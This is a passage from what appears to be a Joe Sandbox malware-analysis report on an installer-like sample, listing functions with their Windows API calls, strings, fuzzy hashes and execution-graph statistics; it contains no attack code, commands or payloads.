                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                              • String ID: f
                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                              • Instruction ID: 7205eec21020573454be23e67ac2b5f41aa1c09cc3aa20a5ad054807a565c042
                                                                                                                              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                              • Instruction Fuzzy Hash: 63014C71900219BADB00DBA4DD85BFEBBBCAF54B11F10012BBA50F61C0D7B49A058BA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetDC.USER32(?), ref: 00401E51
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                              • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                              • String ID: MS Shell Dlg
                                                                                                                              • API String ID: 3808545654-76309092
                                                                                                                              • Opcode ID: f7d2c4ede39cd1ebf9a9ca480a1e70309c94da774c50f234bb5eb93d3cfe4977
                                                                                                                              • Instruction ID: 39ccdc2dc8d2035913c0323839c6798354fd507b9908b2fcb43e3dcb67b0f82d
                                                                                                                              • Opcode Fuzzy Hash: f7d2c4ede39cd1ebf9a9ca480a1e70309c94da774c50f234bb5eb93d3cfe4977
                                                                                                                              • Instruction Fuzzy Hash: C6019271904240EFE7005BB0EE4AB9A3FB4BB15300F208A3AF141B75E2C6B904458BED
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402F2B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                                                                                              • MulDiv.KERNEL32(00AB1D2F,00000064,00AB4388), ref: 00402F74
                                                                                                                              • wsprintfW.USER32 ref: 00402F84
                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                                                                              Strings
                                                                                                                              • verifying installer: %d%%, xrefs: 00402F7E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                              • Opcode ID: 979d028af0be5fac871bb1b50485b5dc61a267ba188a621c9ab53ede625bc3a2
                                                                                                                              • Instruction ID: 5483d255828af9cef8fcdd630f22e0c0956a10275527037d70a62c30cec8c61f
                                                                                                                              • Opcode Fuzzy Hash: 979d028af0be5fac871bb1b50485b5dc61a267ba188a621c9ab53ede625bc3a2
                                                                                                                              • Instruction Fuzzy Hash: 29014471640209BBEF209F60DE49FEA3B79FB04344F008039FA06A51D0DBB995559F58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402E41 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1354259210-0
                                                                                                                              • Opcode ID: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                                                                              • Instruction ID: 81522b48e592499502658fb4677f1b0f70c545d6b701466da39e5ccb8a756ba0
                                                                                                                              • Opcode Fuzzy Hash: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                                                                              • Instruction Fuzzy Hash: 0F215A72500109BBEF129F90CE89EEF7A7DEB54344F110076B945B11A0E7B48E54AAA8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                              • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1849352358-0
                                                                                                                              • Opcode ID: 5af5b17495f11576261f65d9e5f109aee1feef29f3286c425d9ce226ac00a781
                                                                                                                              • Instruction ID: ee10c8015a3e92cf614b22ba24180aec604fe5fe026a1179c0e7be4a3fdf0cdb
                                                                                                                              • Opcode Fuzzy Hash: 5af5b17495f11576261f65d9e5f109aee1feef29f3286c425d9ce226ac00a781
                                                                                                                              • Instruction Fuzzy Hash: E621F672900119AFCB05DFA4DE45AEEBBB5EF08314F14003AFA45F62A0C7789D51DB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405D91 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CharNextW.USER32(?,?,C:\,?,00405E05,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D9F
                                                                                                                              • CharNextW.USER32(00000000), ref: 00405DA4
                                                                                                                              • CharNextW.USER32(00000000), ref: 00405DBC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharNext
                                                                                                                              • String ID: C:\
                                                                                                                              • API String ID: 3213498283-3404278061
                                                                                                                              • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                                                                                                              • Instruction ID: a240d3eb33a110e9c3e2f54eb45e2ed3fb4308986edfa36c5622d0951adac79a
                                                                                                                              • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                                                                                                              • Instruction Fuzzy Hash: B5F09021910F2295DB3177645C4DABB5AB8EFA5364B14C03BE601B72C0D7B88981CBAA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405CE6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034B2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00405CEC
                                                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034B2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00405CF6
                                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405D08
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CE6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                              • API String ID: 2659869361-823278215
                                                                                                                              • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                                                              • Instruction ID: e2e9208f063340fd7176cb3713d1db1a131c248cac7d4947b15e4777b480a213
                                                                                                                              • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                                                              • Instruction Fuzzy Hash: 4FD0A771101A306AC1117B84AC05DDF669CAE85300381403BF201B30A4C77C1D5187FD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402FB1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                                                                                                              • GetTickCount.KERNEL32 ref: 00402FE2
                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2102729457-0
                                                                                                                              • Opcode ID: e942aba91c3d4d0b77748caef32317d1a3e8dc78421a0242562119172c6ce506
                                                                                                                              • Instruction ID: d33bc14a5fcc1787285ca97da28f022d839d2e13e88132ee71d9f244d0d7cdfd
                                                                                                                              • Opcode Fuzzy Hash: e942aba91c3d4d0b77748caef32317d1a3e8dc78421a0242562119172c6ce506
                                                                                                                              • Instruction Fuzzy Hash: 4AF05E3160AA21ABC6216F10FF0DA8B7B64BB48B41741487AF842B15E9DB740CA1DB9D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004053ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsWindowVisible.USER32(?), ref: 0040541C
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 0040546D
                                                                                                                                • Part of subcall function 004043B3: SendMessageW.USER32(00070486,00000000,00000000,00000000), ref: 004043C5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                              • Opcode ID: 26e100c8e936244900aacf90f380f9ed614629df6b7f9272593e4765ff02ca63
                                                                                                                              • Instruction ID: 5278ea034fccd8c5818adddfb220a11f4cbf18c481ac084eeec191c980f5e464
                                                                                                                              • Opcode Fuzzy Hash: 26e100c8e936244900aacf90f380f9ed614629df6b7f9272593e4765ff02ca63
                                                                                                                              • Instruction Fuzzy Hash: F9012C71200609AFDF216F11DD80BDB3B66EB84756F504036FB01752E2C77A8C92DA6E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405E6C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E94
                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA5
                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EAE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 190613189-0
                                                                                                                              • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                              • Instruction ID: 346f7042b660fb70b52ae74c1c6e121eab6bc84344666f805f11c7930e864ff2
                                                                                                                              • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                              • Instruction Fuzzy Hash: A8F06231505418FFD7029BA5DE0099FBBA8EF56250B2540AAE880F7250D674EF019BA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.1%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:245
                                                                                                                              Total number of Limit Nodes:11
